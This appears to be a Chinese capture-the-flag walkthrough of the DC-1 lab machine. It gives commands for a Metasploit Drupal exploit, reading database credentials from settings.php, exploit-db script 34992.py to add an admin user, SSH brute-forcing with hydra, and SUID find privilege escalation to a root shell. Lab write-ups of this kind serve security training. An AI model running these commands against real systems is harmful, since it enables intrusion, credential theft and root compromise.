打开靶场，登录账号密码：

roottoor

然后我们查看ifconfig，访问IP地址可以直接进入靶场

首先进入这个靶场中，我们先了解了这个靶场的cms，是Drupal

首先尝试第一种方式：

我们使用kali中的msf框架进行一个漏洞利用

搜索drupal可利用的漏洞模块

search drupal

我们可以选择一种攻击模块进行尝试。

我这里随便选择了一个，我们查看该模块的配置信息

主要配置信息是rhosts，我们设置一下目标地址

我们直接开始攻击

进去之后可以利用shell，查看当前目录下的内容，找到flag1.txt

提示：

目标cms的关键有一个配置文件目录

/var/www/sites/default/settings.php

我们上面拿到了shell，所以我们这里就可以直接通过shell来查看这个配置文件中的内容

flag2就是这个配置文件，从这个配置文件中我们获取了数据库登录的账号和密码

账号：dbuser

密码：R0ck3t

下面我们需要登录数据库，先优化一下界面，使用python的pty

python -c 'import pty;pty.spawn("/bin/bash")'

连接进数据库中

mysql -udbuser -pR0ck3t

我们进行常规查询命令

show databases;use drupaldb;show tables;

查看users表

select * from users;

有两种方法：

第一种利用密码重置建立一个账户

该cms自带的，忘记密码时执行的语句

php scripts/password-hash.sh 【自定密码】

第二种利用漏洞建立一个用户

我们搜索kali中自带的一些漏洞利用脚本

searchploit drupal

找到下面这个脚本

然后我们记下这个脚本的位置，开始使用

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.0.103 -u bai -p 123456

后面是目标地址，用户名和用户密码

然后使用新添加的账号就可以登录了。

下一步，我们查看一下服务器中的passwd文件，发现有一个flag4用户，但是shadow文件无法查看，所以我们尝试使用hydra破解 一下密码，使用kali内置的字典。

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt 192.168.0.103 ssh

这里我们使用ssh，也就是爆破22端口

这里爆破出密码，我们就可以使用这个账户来远程登录了

ssh flag4@192.168.0.103

我们现在已经成功登录上去了

这里我们就找到flag4

我们到root根目录下，找到了最后一个flag

这里我们需要提权到root权限

我们查看一下可以使用哪些命令来执行root权限

find / -perm -u=s -type f 2>/dev/null

这里我们可以找到这些命令用来提权

我们要利用find命令提权的话，就需要当前目录下搜索一个文件，当前目录下要是没有可以touch创建一个，当前目录下有一个flag4.txt

我们输入

find / -name flag4.txt -exec "/bin/sh" \;

这里我们就成功提权，可以查看最后一个flag

关注公众号发送

dc1

获取靶场文件